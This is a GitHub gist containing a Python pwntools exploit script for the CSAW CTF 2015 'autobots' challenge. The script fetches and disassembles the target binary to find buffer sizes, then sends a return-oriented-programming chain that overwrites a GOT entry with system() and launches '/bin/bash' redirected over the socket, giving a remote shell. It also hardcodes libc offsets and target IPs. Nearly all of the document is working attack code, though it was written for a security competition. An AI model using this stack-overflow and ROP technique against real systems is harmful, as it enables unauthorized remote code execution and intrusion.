Created
September 20, 2015 22:33
-
-
Save rekkusu/79baf07518b46bd891e3 to your computer and use it in GitHub Desktop.
[CSAW CTF 2015] Exploit 350 autobots
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import re | |
| import os | |
| import time | |
| import sys | |
| REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r' | |
| csu_pop = 0x4008ca | |
| csu_call = 0x4008b0 | |
| write_got = 0x601018 | |
| read_got = 0x601038 | |
| leaveret = 0x40086e | |
| bss = 0x601080 | |
| libc_base = 0x7ffff7a15000 | |
| libc_start_main_got = 0x601040 | |
| libc_start_main_libc = 0x21dd0 | |
| execve_libc = 0xc1330 | |
| dup2_libc = 0xebfe0 | |
| binsh_libc = 0x17ccdb | |
| system_libc = 0x46640 | |
| system = libc_base + system_libc | |
| execve = libc_base + execve_libc | |
| dup2 = libc_base + dup2_libc | |
| binsh = libc_base + binsh_libc | |
| port = 0 | |
| bufsize = 0 | |
| readsize = 0 | |
| if REMOTE: | |
| sockfd = 6 | |
| host = '52.20.10.244' | |
| else: | |
| sockfd = 4 | |
| host = '192.168.6.129' | |
| def getbinary(): | |
| global port, bufsize, readsize | |
| s = remote(host, 8888) | |
| f = open('bin', 'wb') | |
| binary = s.recvall() | |
| f.write(binary) | |
| f.close() | |
| s.close() | |
| os.system('objdump -d bin --no -M intel --start-address=0x40077d --stop-address=0x40086f > disas') | |
| disas = open('disas', 'r').read() | |
| if '40082e' not in disas: | |
| return False | |
| m = re.search('4007d4.*?edi,(.*)', disas) | |
| port = int(m.group(1), 16) | |
| print '[+] Port:', port | |
| m = re.search('400824.*?(0x.*)\]', disas) | |
| bufsize = int(m.group(1), 16) | |
| print '[+] Bufsize:', bufsize | |
| m = re.search('40082e.*?,(.*)', disas) | |
| readsize = int(m.group(1), 16) | |
| print '[+] Readsize:', readsize | |
| if readsize - bufsize >= 0x88: | |
| print '[+] Found vulnerability' | |
| return True | |
| else: | |
| print '[-] The binary is safe' | |
| return False | |
| while not getbinary(): | |
| time.sleep(1) | |
| s = remote(host, port) | |
| # address leak | |
| #payload = ''.join([ | |
| # 'A' * (bufsize - 0x10), | |
| # p64(0), | |
| # p64(0), | |
| # p64(bss), | |
| # | |
| # p64(csu_pop), | |
| # p64(0), | |
| # p64(1), | |
| # p64(write_got), | |
| # p64(8), | |
| # p64(write_got), | |
| # p64(sockfd), | |
| # | |
| # p64(csu_call), | |
| #]) | |
| # | |
| #s.send(payload) | |
| #time.sleep(0.5) | |
| # | |
| #buf = s.recv(1024) | |
| # | |
| #libc_start_main_addr = u64(buf[:8]) | |
| #print 'libc_start_main_addr:', hex(libc_start_main_addr) | |
| payload = ''.join([ | |
| 'A' * (bufsize - 0x10), | |
| p64(0), | |
| p64(0), | |
| p64(bss), | |
| p64(csu_pop), | |
| p64(0), | |
| p64(1), | |
| p64(read_got), | |
| p64(0x100), | |
| p64(bss), | |
| p64(sockfd), | |
| p64(csu_call), | |
| p64(0), | |
| p64(0), | |
| p64(1), | |
| p64(bss), | |
| p64(0), | |
| p64(0), | |
| p64(bss + 8), | |
| p64(csu_call), | |
| ]) | |
| print 'overflow length:', hex(len(payload) - bufsize) | |
| s.send(payload) | |
| time.sleep(0.5) | |
| s.send(p64(system) + '/bin/bash 0>&6 1>&6 \0') | |
| s.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment